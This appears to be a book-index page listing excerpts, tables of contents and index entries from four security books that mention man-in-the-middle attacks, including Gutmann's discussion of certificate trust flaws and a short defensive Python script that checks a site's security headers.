MITM: man-in-the-middle

118 results back to index


Engineering Security by Peter Gutmann

active measures, address space layout randomization, air gap, algorithmic trading, Amazon Web Services, Asperger Syndrome, bank run, barriers to entry, bitcoin, Brian Krebs, business process, call centre, card file, cloud computing, cognitive bias, cognitive dissonance, cognitive load, combinatorial explosion, Credit Default Swap, crowdsourcing, cryptocurrency, Daniel Kahneman / Amos Tversky, Debian, domain-specific language, Donald Davies, Donald Knuth, double helix, Dr. Strangelove, Dunning–Kruger effect, en.wikipedia.org, endowment effect, false flag, fault tolerance, Firefox, fundamental attribution error, George Akerlof, glass ceiling, GnuPG, Google Chrome, Hacker News, information security, iterative process, Jacob Appelbaum, Jane Jacobs, Jeff Bezos, John Conway, John Gilmore, John Markoff, John von Neumann, Ken Thompson, Kickstarter, lake wobegon effect, Laplace demon, linear programming, litecoin, load shedding, MITM: man-in-the-middle, Multics, Network effects, nocebo, operational security, Paradox of Choice, Parkinson's law, pattern recognition, peer-to-peer, Pierre-Simon Laplace, place-making, post-materialism, QR code, quantum cryptography, race to the bottom, random walk, recommendation engine, RFID, risk tolerance, Robert Metcalfe, rolling blackouts, Ruby on Rails, Sapir-Whorf hypothesis, Satoshi Nakamoto, security theater, semantic web, seminal paper, Skype, slashdot, smart meter, social intelligence, speech recognition, SQL injection, statistical model, Steve Jobs, Steven Pinker, Stuxnet, sunk-cost fallacy, supply-chain attack, telemarketer, text mining, the built environment, The Death and Life of Great American Cities, The Market for Lemons, the payments system, Therac-25, too big to fail, Tragedy of the Commons, Turing complete, Turing machine, Turing test, Wayback Machine, web application, web of trust, x509 certificate, Y2K, zero day, Zimmermann PGP

id=1580452. [132] “Windows Root Certificate Program Members”, Microsoft Corporation, 24 November 2009, http://support.microsoft.com/kb/931125. [133] “An Observatory for the SSLiverse”, Peter Eckersley and Jesse Burns, presentation at Defcon 18, July 2010, http://www.eff.org/files/DefconSSLiverse.pdf [134] “Clarifying The Trustwave CA Policy Update”, TrustWave, 4 February 2012, http://blog.spiderlabs.com/2012/02/clarifying-the-trustwave-capolicy-update.html. [135] “Trustwave admits crafting SSL snooping certificate”, John Leyden, 8 February 2012, http://www.theregister.co.uk/2012/02/09/tustwave_disavows_mitm_digital_cert. [136] “Trustwave admits issuing man-in-the-middle digital certificate; Mozilla debates punishment”, Lucian Constantin, 8 February 2012, http://www.computerworld.com/s/article/9224082/Trustwave_admits_i ssuing_man_in_the_middle_digital_certificate_Mozilla_debates_punishment. [137] “Remove Trustwave Certificate(s) from trusted root certificates”, Patrick Tate, 8 February 2012, https://bugzilla.mozilla.org/show_bug.cgi?

Mind you Apple didn’t just trust Verisign-issued certificates but any certificates that users dropped onto their devices, so that it was possible to bypass the payment system in Apple’s app store by installing your own CA certificate on your iPhone, iPad, or Mac and having it “validate” purchases through you rather than the real app store [239][240][241][242]11 (the fact that Apple took precautions to protect against outsiders but not against their own users is an example of projection bias, covered in more detail in “Confirmation Bias and other Cognitive Biases” on page 145). More than a year later the same issue was still present in Apple’s iMessage system, which trusted any CA-issued certificate (rather than only ones designated as being for the iMessage servers), allowing man-in-the-middle (MITM) attacks on communications with the iMessage servers. Since iMessage sends the AppleID and password in the clear (over the potentially MITM’d link), a single MITM on an iMessage communication would give an attacker access to the user’s iCloud accounts, backups, and everything else connected to their Apple account [243]. These problems were made even worse by the fact that the CA root certificate posted on Apple’s web site was for “Apple Root Certificate Authority” [244] while the iPhone one is for “Apple Root CA”, making it impossible to verify the certificates issued with it even if someone did track the other root certificate down to Apple’s web site because the certificates are identified as coming from a different CA (this has since been corrected after Apple were informed of the problem).

To defeat SSL’s lack of server authentication all that a phisher has to do is set up their lures and wait for victims to scurry in, a fire-andforget solution that requires no further effort from the attacker. In contrast to defeat SSH’s lack of server authentication the attacker has to wait for the victim to connect to a predefined server and then perform an active man-in-the-middle attack, a 10 Since ssharp is based on a modified, rather old, version of OpenSSH it’d be amusing to use one of the assorted OpenSSH security holes to attack the MITM while the MITM is attacking you. User Conditioning 33 considerably more difficult task (a longer discussion of the security of SSH’s server authentication is given in “Key Continuity in SSH” on page 377). SSL Certificates: Indistinguishable from Placebo The security model used with SSL/TLS server certificates might be called honestybox security: In some countries newspapers and similar low-value items are sold on the street by having a box full of newspapers next to a coin box (the honesty box) into which people are trusted to put the correct coins before taking out a paper.


pages: 422 words: 86,414

Hands-On RESTful API Design Patterns and Best Practices by Harihara Subramanian

blockchain, business logic, business process, cloud computing, continuous integration, create, read, update, delete, cyber-physical system, data science, database schema, DevOps, disruptive innovation, domain-specific language, fault tolerance, information security, Infrastructure as a Service, Internet of things, inventory management, job automation, Kickstarter, knowledge worker, Kubernetes, loose coupling, Lyft, machine readable, microservices, MITM: man-in-the-middle, MVC pattern, Salesforce, self-driving car, semantic web, single page application, smart cities, smart contracts, software as a service, SQL injection, supply-chain management, web application, WebSocket

They intend to steal, eavesdrop on, impersonate and secretly relay, intercept, or alter communications, including API messages, between two communicating parties, all while it appears as though a normal exchange of information is underway: The preceding diagram depicts a typical MITM attack, where the eavesdropper impersonates and relays communications/responses to the caller as they come from the server, and they will appear genuine. An example of an MITM attack could be communication between an API that issues a session token as part of an HTTP header and a perpetrator acting as a man in the middle between the user's browser and the HTTP header (session token). So, it's easy to intercept that session token as it opens up access to the user's account, then the damage can be done depending on that account's privileges. Common types of MITM attacks and protection measures There are a few common MITM attacks, as found in the following list, that you need to be aware of, and also a few protection measures against those attacks: Sniffing: Sniffing, also known as packet sniffing, in which attackers use widely/freely available packet capture tools by using specific wireless devices to inspect and monitor packets communicated over a network.

Testing aspects of this vulnerability should focus on two essential scenarios—whether the user can directly browse a resource, and whether the UI accessing the API resources expose an unauthorized resource to that UI. Man-in-the-middle attacks An MITM attack is an attack by a perpetrator who has placed themself in the middle of a network or communication between a genuine user and an application server. They intend to steal, eavesdrop on, impersonate and secretly relay, intercept, or alter communications, including API messages, between two communicating parties, all while it appears as though a normal exchange of information is underway: The preceding diagram depicts a typical MITM attack, where the eavesdropper impersonates and relays communications/responses to the caller as they come from the server, and they will appear genuine.

PacktPub.com Contributors About the authors About the reviewers Packt is searching for authors like you Preface Who this book is for What this book covers To get the most out of this book Download the example code files Conventions used Get in touch Reviews Introduction to the Basics of RESTful Architecture Technical requirements Evolution of web technologies Learning about Web 3.0 Learning about web service architecture Discussing the web API Learning about service-oriented architecture Learning about resource-oriented architecture Resource-oriented design The benefits of ROA Beginning with REST REST architecture style constraints Beginning with client-server The client in client-server architecture The service in client-server architecture Understanding statelessness Advantages and disadvantages of statelessness Caching constraint in REST Benefits of caching Understanding the uniform interface Identification of resources Manipulation of resources Self-descriptive messages Hypermedia as the Engine of Application State Layered systems Code on demand RESTful service mandates Architectural goals of REST Summary Design Strategy, Guidelines, and Best Practices Technical requirements Learning about REST API and its importance Goals of RESTful API design Affordance Loosely coupled Leverage web architecture API designer roles and responsibilities  API design best practices API design principles Ubiquitous web standards Flexibility Granularity Optimized APIs Functionality Learning about unusual circumstances Community standardization API playgrounds RESTful API design rules Learning about Uniform Resource Identifiers URI formats REST API URI authority Resource modelling Resource archetypes URI path URI query HTTP interactions Request methods Response status codes Metadata design HTTP headers Media types and media type design rules Representations Message body format Hypermedia representation Media type representation Errors representation Client concerns Versioning Security Response representation composition Processing hypermedia JavaScript clients Summary Further reading Essential RESTful API Patterns Technical requirements Beginning with the installations Beginning with RESTful API patterns – part I Statelessness Content negotiation Content negotiation with HTTP headers URI templates Design for intent Pagination Discoverability Error and exception logging Unicode Summary Advanced RESTful API Patterns Technical requirements RESTful API advanced patterns Versioning Versioning through the URI path Versioning through query parameters Versioning through custom headers Versioning through content-negotiation Authorization Authorization with the default key Authorization with credentials Uniform contract Entity endpoints Endpoint redirection Idempotent Bulk operation Circuit breaker Combining the circuit pattern and the retry pattern API facade Backend for frontend Summary Further reading Microservice API Gateways Technical requirements About microservice architecture The prominent infrastructure modules in microservice-centric applications Service registry  Service discovery Composition/orchestration  Transformation  Monitoring  Load balancing and scaling  High availability and failover  HA and failover guidelines Governance  About API gateway solutions API gateways for microservice-centric applications The issues with microservice API gateways Security features of API gateways Prominent API gateway solutions Service mesh versus API gateway Summary RESTful Services API Testing and Security An overview of software testing  RESTful APIs and testing Basics of API testing Understanding API testing approaches API testing types Unit tests API validation tests Functional tests UI or end-to-end tests Load testing Runtime error detection tests Monitoring APIs Execution errors Resource leaks Error detection REST API security vulnerabilities Exposing sensitive data Understanding authentication and authentication attacks Understanding authorization and OAuth2 schemes Cross-site scripting Reflected XSS Stored XSS DOM XSS Cross-site request forgery Denial-of-service attack Distributed denial of service Injection attacks Insecure direct object references Missing function-level access control Man-in-the-middle attacks Common types of MITM attacks and protection measures Replay attacks and spoofing Causes of vulnerabilities API design and development flaws Poor system configuration Human error Internal and external connectivity Security tests Penetration tests or pen tests Importance of penetration tests Pen testing lifecycle Preparation, planning, and reconnaissance Scanning Gaining access Maintaining access Analysis Pen testing types for API testing White-box penetration testing Fuzz tests The life cycle of fuzz tests Fuzz testing strategy Mutation-based fuzz tests Generation-based fuzz tests Advantages and disadvantages of fuzz tests Back to API testing API test cases Essential aspects of API test cases and test case preparation API testing challenges Initial setup API schema updates for testing Testing parameter combinations API call sequence Validating parameters Tracking system integration API testing best practices API testing tools CQRS Summary Further reading RESTful Service Composition for Smart Applications Technical requirements Briefing RESTful microservices Demystifying the MSA style The advantages of microservices The emergence of cloud-native applications The growing ecosystem of IoT device services The changing application ecosystem Tending toward the API-driven world The Representational State Transfer service paradigm API design best practices Learning about service-composition methods Service orchestration and choreography Beginning with service orchestration The shortcomings of service orchestration Applying orchestration-based composition Beginning with service choreography The shortcomings of service choreography Applying choreography-based composition The hybridization of orchestration and choreography Another example of the hybridization of orchestration and choreography Choreography Service choreography using the message broker Service orchestration Service orchestration using BPMN and REST The hybridization – event-driven service orchestration Data management  Thinking in REST Discarding SQL join Eventual consistency Polyglot persistence Summary RESTful API Design Tips Technical requirements Beginning with APIs Learning about application programming interfaces APIs have become indispensable Learning about the major types of APIs Describing API platforms Creating API development platforms API-integration platforms Legacy integration API management platforms Demystifying the RESTful services paradigm Characterizing the REST architecture style REST Resource Representation Compression Idempotent REST APIs REST API design considerations Enumerating RESTful API design patterns Media types API security design patterns Whitelist allowable methods Summary Further reading A More In-depth View of the RESTful Services Paradigm Technical requirements Tending toward the software-defined and software-driven world Software-enabled clouds for the digital intelligence era The IoT applications and services Cloud-enabled applications Cloud-native applications Mobile, handheld, and wearable applications Transactional, operational, and analytical applications Knowledge visualization applications Social applications  Scientific and technical applications  Centralized and distributed applications Decentralized and intelligent applications with blockchain technology  Composite and multi-container applications  Event-driven applications  High-quality applications Resilient applications  The REST paradigm for application modernization and integration Application programming interfaces Public APIs for external integration and innovation Private APIs for internal purposes  APIs for IoT devices APIs for application integration Describing the RESTful services paradigm REST architectural constraints The advantages of REST Self-descriptive messages SOAP versus REST When to use REST versus SOAP Best practices for REST-based microservices The API-first approach Developing API-first Building services API-first Summary Further reading Frameworks, Standard Languages, and Toolkits Technical requirements Core features of a framework Spring Boot Core features of Spring Database integration with Spring data Messaging integration Extending Spring with auto-configuration Writing unit tests and integration test cases Benefits of Spring Boot Drawbacks of Spring Boot Beginning about Light 4j Core features of Light 4j Learning about Light Rest 4j Light-code-gen Choosing Light 4j over the rest Spark Framework Core features of Spark Framework Creating an API with fewer lines Benefits of Spark Drawbacks of Spark Dropwizard Overview Core features of Dropwizard Jetty for HTTP Jersey for REST Jackson Metrics Liquibase Other noteworthy features Benefits of Dropwizard Drawbacks of Dropwizard Understanding Go framework for the RESTful API An overview Gin-gonic Core features HttpRouter Http2 server push Multi-template Upload files Other noteworthy features Benefits of Gin-Gonic Drawbacks of Gin-Gonic Revel Core features Router Server engine Controllers Handlers Interceptors Filters Cache Other noteworthy features Benefits of Revel Drawbacks of Revel Python RESTful API frameworks Overview of Python Django Django Rest Framework Core features Web-browsable API Authentication Serialization and deserialization Other noteworthy features Benefits of the DRF Drawbacks of the DRF Flask Flask-RESTful Core features of Flask-RESTful Resourceful routing Restful request parsing Output fields Other noteworthy features Benefits of the Flask framework Drawbacks of Flask Frameworks – a table of reference  Summary Further reading Legacy Modernization to Microservices-Centric Apps Technical requirements A preview of containers and microservices Introducing the microservices architecture Why legacy modernization?


pages: 224 words: 45,431

Python Web Penetration Testing Cookbook by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, Dave Mound

en.wikipedia.org, information security, Kickstarter, Minecraft, MITM: man-in-the-middle, SQL injection, web application

= 'nosniff': print 'X-Content-Type-Options not set properly' except: print 'X-Content-Type-Options not set' The next Strict-Transport-Security header is used to force communication over a HTTPS channel, to prevent man in the middle (MITM) attacks. The lack of this header means that the communication channel could be downgraded to HTTP by an MITM attack: try: hsts = req.headers['Strict-Transport-Security'] except: print 'HSTS header not set, MITM attacks may be possible' The final Content-Security-Policy header is used to restrict the type of resources that can load on the web page, for example, restricting where JavaScript can run: try: csp = req.headers['Content-Security-Policy'] print 'Content-Security-Policy set:', csp except: print 'Content-Security-Policy missing' The output from the recipe is shown in the following screenshot: Brute forcing login through the Authorization header Many websites use HTTP basic authentication to restrict access to content.

Index A alternative sitesidentifying, by spoofing user agents / Identifying alternative sites by spoofing user agents, How it works… Application Programming Interface (API)about / Gathering information using the Shodan API Atbash ciphercracking / Cracking the Atbash cipher, How it works… automated fuzzingabout / Automated fuzzing, How to do it…, How it works… automated URL-based Cross-site scripting / Automated URL-based Cross-site scripting, How it works…, Automated parameter-based Cross-site scripting, How to do it…, How it works…, There's more… automated URL-based Directory Traversal / Automated URL-based Directory Traversal, How it works… B Base64 encodingabout / Encoding with Base64, How it works… Bcrypt hashgenerating / Generating a Bcrypt hash, How to do it…, How it works… about / Generating a Bcrypt hash BeautifulSoup library / There’s more… blind SQL Injectionexploiting / Exploiting Blind SQL Injection, How it works… Boolean SQLiexploiting / Exploiting Boolean SQLi, How it works…, There's more… brute forcing loginthrough authorization header / Brute forcing login through the Authorization header, How it works…, There's more… C Capture The Flag (CTF) challenges / Encoding with ROT13 clickjackingabout / Testing for clickjacking vulnerabilities clickjacking vulnerabilitiestesting for / Testing for clickjacking vulnerabilities, How to do it…, How it works… commandenabling, steganography used / Getting ready, How to do it…, How it works… comma separated variables (CSV) / IntroductionNmap XML, converting to / Converting Nmap XML to CSV, Getting ready, How it works… Sslscan, parsing / Parsing Sslscan into CSV, How it works… commentssearching, in source code / Finding comments in source code, How it works…, There's more… common transfer files (CTFs) / Shellshock checking Common Vulnerabilities and Exposures (CVE) / How it works… controlenabling, steganography used / Enabling command and control using steganography, How to do it…, How it works… Cross-site scripting (XSS) / Introduction Cross Site Tracing (XST) / Testing HTTP methods D Damn Vulnerable Web App (DVWA) / How to do it… dataextracting, through HTTP requests / Extracting data through HTTP requests, How to do it…, How it works… Direct Object Reference (DOR) / Automated URL-based Directory Traversal E e-mail addressesgenerating, from names / Generating e-mail addresses from names, How to do it… searching, from web pages / Finding e-mail addresses from web pages, How it works…, There's more… e-mailsextracting, to Maltego / Extracting e-mails to Maltego, How it works… F filesenumerating / Enumerating files, How to do it…, How it works… FTP C2creating / Creating an FTP C2, How it works… FuzzDBURL / Getting ready fuzzingabout / Automated fuzzing G Google+ APIused, for downloading profile pictures / Downloading profile pictures using the Google+ API, How it works additional results, harvesting using pagination / How it works Google+ API searchscripting / Scripting a Google+ API search, How it works…, See also… Google+ pagination APIadditional results, harvesting using pagination / Harvesting additional results from the Google+ API using pagination graphsgenerating, plot.ly used / Generating graphs using plot.ly, How it works… H hashesidentifying / Identifying hashes, How it works… header based Cross-site scriptingabout / Header-based Cross-site scripting, How it works…, See also Hide_message functionabout / How it works… carrier parameter / How it works… message parameter / How it works… outfile parameter / How it works… HTTP C2creating / Creating an HTTP C2, Getting Started, How it works… HTTP headersservers, fingerprinting through / Fingerprinting servers through HTTP headers, How it works…, There's more… HTTP methodstesting / Testing HTTP methods, How it works…, There's more… HTTP requestsdata, extracting through / Extracting data through HTTP requests, How to do it…, How it works… HTTP RFC handyURL / Introduction I ImgurURL / Getting ready informationobtaining, Shodan API used / Getting ready, How to do it…, How it works…, There's more… insecure cookie flagstesting for / Testing for insecure cookie flags, How it works…, There's more… insecure headerstesting for / Testing for insecure headers, How it works… Internet Control Message Protocol (ICMP) packet / Performing a ping sweep with Scapy Intrusion Detection System (IDS) / Enabling command and control using steganography J jitterchecking / Checking jitter, How to do it…, How it works… about / Checking jitter jQuery checkingabout / jQuery checking, How it works…, There's more… K 10k common passwords, GitHubreference / Getting ready L least significant bit (LSB)about / Introduction linear congruential generatorpredicting / Predicting a linear congruential generator , Getting ready, How it works… linksextracting, from URL to Maltego / Extracting links from a URL to Maltego, How it works… LSB steganographyused, for hiding message / Hiding a message using LSB steganography, How to do it…, How it works… M Maltegolinks, extracting from URL / Extracting links from a URL to Maltego, How it works… e-mails, extracting to / Extracting e-mails to Maltego, How it works… man in the middle (MITM) attacks / How it works… MD5 hashabout / Generating an MD5 hash generating / How to do it…, How it works… cracking / Cracking an MD5 hash, How to do it…, How it works… messagehiding, LSB steganography used / Hiding a message using LSB steganography, How to do it…, How it works… extracting, hidden in LSB / Extracting messages hidden in LSB, How it works… N Network Time Protocol (NTP) / Converting Nmap XML to CSV Nmapabout / Converting Nmap XML to CSV Nmap XMLconverting, to CSV / Converting Nmap XML to CSV, Getting ready, How it works… Not Safe For Work (NSFW) tag / Encoding with ROT13 O one-time pad reuseattacking / Attacking one-time pad reuse, Getting ready, How it works… online CVE databasesreference / There's more… Open Source Intelligence (OSINT)about / Introduction / Introduction Open Web Application Security Project (OWASP) / Introduction P paginationused, for harvesting additional results from Google+ API / Harvesting additional results from the Google+ API using pagination, How it works passwordsbrute forcing / Brute forcing passwords, How to do it…, How it works… payloadsencoding / Encoding payloads, How it works… PHPSESSIONURL / There's more… pingsweepperforming, Scapy used / Performing a ping sweep with Scapy, How to do it…, How it works… plot.lyused, for generating graphs / Generating graphs using plot.ly, How it works… profile picturesdownloading, Google+ API used / Downloading profile pictures using the Google+ API, How it works Python Image Library (PIL) / Getting ready Q QtWebKitused, for obtaining website screenshots / Getting screenshots of websites with QtWebKit, How it works… about / Getting ready R regular expressions (Regex) / Identifying hashes ROT13 encodingabout / Encoding with ROT13 using / How to do it…, How it works… S Scapyused, for performing pingsweep / Performing a ping sweep with Scapy, How it works… about / Performing a ping sweep with Scapy scanning with / Scanning with Scapy, How it works… URL / There's more… screenshotsbased on port list / Screenshots based on a port list, How it works…, There's more… Security Operation Centre (SOC) analyst / Creating an Twitter C2 serversfingerprinting, through HTTP headers / Fingerprinting servers through HTTP headers, How it works…, There's more… session fixationabout / Session fixation through a cookie injection through cookie injection / Session fixation through a cookie injection, How it works…, There's more… SHAimplementing, in real-world scenario / Implementing SHA in a real-world scenario, How it works… SHA 1/128/256 hashgenerating / Generating an SHA 1/128/256 hash, How it works… SHA and MD5 hashesimplementing together / Getting ready, How it works… Shellshock checkingabout / Shellshock checking, How it works… Shodanabout / Gathering information using the Shodan API URL / Gathering information using the Shodan API Shodan APIused, for obtaining information / Gathering information using the Shodan API, How to do it…, How it works…, There's more… simple Netcat shellcreating / Creating a simple Netcat shell, How it works… SoupStrainer / There’s more… SQL Injectionabout / Introduction SQLi test pagesreference / There's more… Sslscanabout / Parsing Sslscan into CSV parsing, into CSV / Parsing Sslscan into CSV, How it works… standard twitter APIURL / How it works… steganographyabout / Introduction used, for enabling command and control / Enabling command and control using steganography, How to do it…, How it works… substitution ciphercracking / Cracking a substitution cipher, How it works… T texthiding, in images / Hiding text in images, How it works…, There's more… extracting, from images / Extracting text from images, How it works…, There's more… TRACE / Testing HTTP methods Twitter C2creating / Creating an Twitter C2, How to do it…, How it works… U URL-based SQLiidentifying / Identifying URL-based SQLi, How to do it…, How it works…, There's more… usernamesbrute forcing / Brute forcing usernames, How to do it…, How it works… username validitychecking / Checking username validity, Getting ready, How it works… W Web App Firewalls (WAFs) / Encoding payloads websitesspidering / Spidering websites, How it works… website screenshotsobtaining, QtWebKit used / Getting screenshots of websites with QtWebKit, How to do it…, How it works… Wikipedia page on ANSIURL / How it works…

= '1; mode=block': print 'X-XSS-Protection not set properly, XSS may be possible:', xssprotect except: print 'X-XSS-Protection not set, XSS may be possible' try: contenttype = req.headers['X-Content-Type-Options'] if contenttype != 'nosniff': print 'X-Content-Type-Options not set properly:', contenttype except: print 'X-Content-Type-Options not set' try: hsts = req.headers['Strict-Transport-Security'] except: print 'HSTS header not set, MITM attacks may be possible' try: csp = req.headers['Content-Security-Policy'] print 'Content-Security-Policy set:', csp except: print 'Content-Security-Policy missing' print '----' How it works… This recipe is configured for testing many sites, so the first part reads in the URLs from the text file and prints out the current target: urls = open("urls.txt", "r") for url in urls: url = url.strip() req = requests.get(url) print url, 'report:' Each header is then tested inside a try/except block.


Linux Security Cookbook by Daniel J. Barrett, Richard E. Silverman, Robert G. Byrnes

Debian, GnuPG, MITM: man-in-the-middle, web of trust

DROP, refusing packets with disabling TCP service invocation by remote request inserting firewall rules in particular position listing firewall rules logging and dropping certain packets permitting incoming SSH access only preventing pings protecting dedicated server restricting telnet service access by source address simulating packet traversal through to verify firewall operation testing firewall configuration ipchains-restore loading firewall configuration ipchains-save checking IP addresses saving firewall configuration viewing rules with IPSec iptables --syn flag to process TCP packets blocking access for particular remote host for a particular service blocking access for some remote hosts but not others blocking all access by particular remote host blocking all incoming HTTP traffic blocking incoming HTTP traffic while permitting local HTTP traffic blocking incoming network traffic blocking outgoing access to all web servers on a network blocking outgoing Telnet connections blocking outgoing traffic blocking outgoing traffic to particular remote host blocking remote access, while permitting local blocking spoofed addresses building chain structures controlling access by MAC address default policies deleting firewall rules disabling reverse DNS lookups (-n option) disabling TCP service invocation by remote request DROP and REJECT, refusing packets with error packets, tailoring inserting firewall rules in particular position listing firewall rules permitting incoming SSH access only preventing pings protecting dedicated server restricting telnet service access by source address rule chain for logging and dropping certain packets testing firewall configuration website iptables-restore loading firewall configuration iptables-save checking IP addresses saving firewall configuration viewing rules with IPv4-in-IPv6 addresses, problems with ISP mail servers, acceptance of relay mail issuer (certificates) self-signed [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] John the Ripper (password-cracking software) dictionaries for download site wordlist directive [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] kadmin utility adding Kerberos principals to IMAP mail server adding users to existing realm modifying KDC database for host running on new host setting server to start at boot kadmind command (Kerberos) kaserver (Andrew Filesystem) kdb5_util command (Kerberos) KDC [See Key Distribution Center] KDE applications, certificate storage Kerberos authentication in /etc/pam.d startup file hosts, adding to existing realm IMAP, using with Key Distribution Centers (KDCs) ksu ksu command PAM, using with without passwords POP, using with setting up MIT Kerberos-5 KDC sharing root privileges via SSH, using with debugging SSH-1 protocol Telnet, using with users, adding to existing realm web site (MIT) KerberosTgtPassing (in sshd_config) kernel /proc files and collection of messages from by system logger enabling source address verification IP forwarding flag ipchains (Versions 2.2 and up) iptables (Versions 2.4 and up) process information recorded on exit runtime integrity checkers source address verification, enabling Key Distribution Center (KDC), setting up for MIT Kerberos-5 keyring files (GnuPG) adding keys to viewing keys on information listed for keys keys, cryptographic [See also cryptographic authentication] adding to GnuPG keyring backing up GnuPG private key dummy keypairs for imapd and pop3d encrypting files for others with GnuPG generating key pair for GnuPG GnuPG, viewing on your keyring key pairs in public-key encryption keyring files for GnuPG keys obtaining from keyserver and verifying OpenSSH programs for creating/using PGP keys, using in GnuPG revoking a public key sharing public keys securely Tripwire viewing on GnuPG keyring keyserver adding key to informing that a public keys is no longer valid obtaining keys from uploading new signatures to killing processes authorizing users to kill via sudo command pidof command, using terminating SSH agent on logout kinit command (Kerberos) 2nd 3rd -f option (forwardable credentials) klist command (Kerberos) 2nd known hosts database (OpenSSH server) kpasswd command (Kerberos) krb5.conf file, copying to new Kerberos host krb5.keytab file krb5kdc kstat (integrity checker) ksu (Kerberized su) authentication via Kerberos sharing root privileges via [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] last command 2nd lastb command lastcomm utility bugs in latest version lastdb command lastlog command databases from several systems, merging multiple systems, monitoring problems with ldd command libnet (toolkit for network packet manipulation) libnids (for TCP stream reassembly) libpcap (packet capture library) 2nd binary files Snort logging directory, creating in logging Snort data to libpcap-format files network trace files, ngrep Snort, use by libwrap, using with xinetd Linux /proc filesystem differing locations for binaries and configuration files in distributions encryption software included with operating system vulnerabilities Red Hat [See Red Hat Linux] supported distributions for security recipes SuSE [See SuSE Linux] ListenAddress statements, adding to sshd_config listfile module (PAM) ACL file entries local acces, permitting while blocking remote access local facilities (system messages) local filesystems, searching local key (Tripwire) creating with twinstall.sh script fingerprints, creating in secure integrity checks read-only integrity checking local mail (acceptance by SMTP server) local password authentication, using Kerberos with PAM localhost problems with Kerberos on SSH SSH port forwarding, use in unsecured mail sessions from logfile group configuration file (logwatch) logger program writing system log entries via shell scripts and syslog API logging access to services combining log files firewalls, configuring for nmap -o options, formats of PAM modules, error messages rotating log files service access via xinetd shutdowns, reboots, and runlevel changes in /var/log/wtmp Snort 2nd to binary files partitioning into separate files permissions for directory stunnel messages sudo command remotely system [See system logger] testing with nmap stealth operations loghost changing remote logging of system messages login shells, root logins adding another Kerberos principal to your ~/.k5login file Kerberos, using with PAM monitoring suspicious activity printing information about for each user recent logins to system accounts, checking testing passwords for strength CrackLib, using John the Ripper, using logouts, history of all on system logrotate program 2nd 3rd logwatch filter, defining integrating services into listing all sudo invocation attempts scanning log files for messages of interest scanning Snort logs and sending out alerts scanning system log files for problem reports lsh (SSH implementation) lsof command +M option, (for processes using RPC services) -c option (command name for processes) -i option (for network connections) -p option (selecting processes by ID) -u option (username for processes) /proc files, reading IP addresses, conversion to hostnames network connections for processes, listing [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] m4 macro processor MAC addresses controlling access by spoofed mail [See email IMAP POP] Mail application (Mozilla) mail clients connecting to mail server over SSL support for secure POP and IMAP using SSL mail facility (system messages) mail servers receiving Internet email without visible server support for SSL testing SSL connection locally Mailcrypt mc-deactivate-passwd to force passphrase erasure official web site using with GnuPG mailpgp (script for encrypting/sending email) mailsnarf command -v option, capturing only unencrypted messages malicious program, /tmp/ls man-in-the-middle (MITM) attacks dsniff, proof of concept with self-signed certificates, risk of services deployed with dummy keys manual integrity checks mask format, CIDR Massachusetts Institute of Technology (MIT) Kerberos matching anything (ALL keyword) 2nd max_load keyword (xinetd) 2nd mc-encrypt function MD5 checksum verifying for RPM-installed files merging system log files MH (mail handler) mirroring a set of files securely between machines MIT Kerberos MITM [See man-in-the-middle attacks] modules PAM CrackLib listfile 2nd pam_stack Perl Sys::Lastlog and Sys::Utmp Sys::Syslog XML::Simple monitoring systems for suspicious activity account use checking on multiple systems device special files directing system messages to log files displaying executed commands executed command, monitoring filesystems searching effectively finding accounts with no password finding superuser accounts finding writable files insecure network protocols, detecting local network activities log files, combining logging login passwords logins and passwords logwatch filter for services not supported lsof command, investigating processes with network-intrusion detection with Snort 2nd decoding alert messages logging output partitioning logs into files ruleset, upgrading and tuning networking observing network traffic with Ethereal GUI open network ports, testing for packet sniffing with Snort recovering from a hack rootkits rotating log files scanning log files for problem reports search path, testing searching for strings in network traffic security incident report, filing sending messages to system logger setuid and setgid programs, insecure syslog configuration, testing syslog messages, logging remotely tracing processes writing system log entries shell scripts with C with Perl scripts monitoring tools for networks NIH page web page information on morepgp (script for decrypting/reading email) mount command -o nodev (prohibiting device special files) grpid option noexec option nosuid option setuid and setgid programs, protecting against misuse mounts file (/proc) Mozilla certificate storage encrypted mail with Mail & Newsgroups Muffet, Alec (Crack utility) multi-homed hosts firewall for SSH client, problems with canonical hostname multi-homed server machines, socket mail server is listening on multicast packets multithreaded services (in inetd.conf) mutt mailer home web page securing POP/IMAP with SSL [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] NAMEINARGS flag for xinetd NAT gateway, canonical client hostname and National Infrastructure Protection Center (NIPC) (U.S.)

These keys are distributed with every Red Hat system: they are public knowledge. If you deploy a service using default, dummy keys, you are vulnerable to a man-in-the-middle (MITM) attack, in which the attacker impersonates your system using the well-known dummy private keys. Furthermore, the name in the certificate does not match your server's hostname, and the certificate is not issued by a recognized Certifying Authority; both of these conditions will be flagged as warnings by your mail client. [Recipe 4.4] To preserve the server authentication and MITM resistance features of SSL, generate a new key for your mail server, and obtain an appropriate certificate binding the key to your server's name.

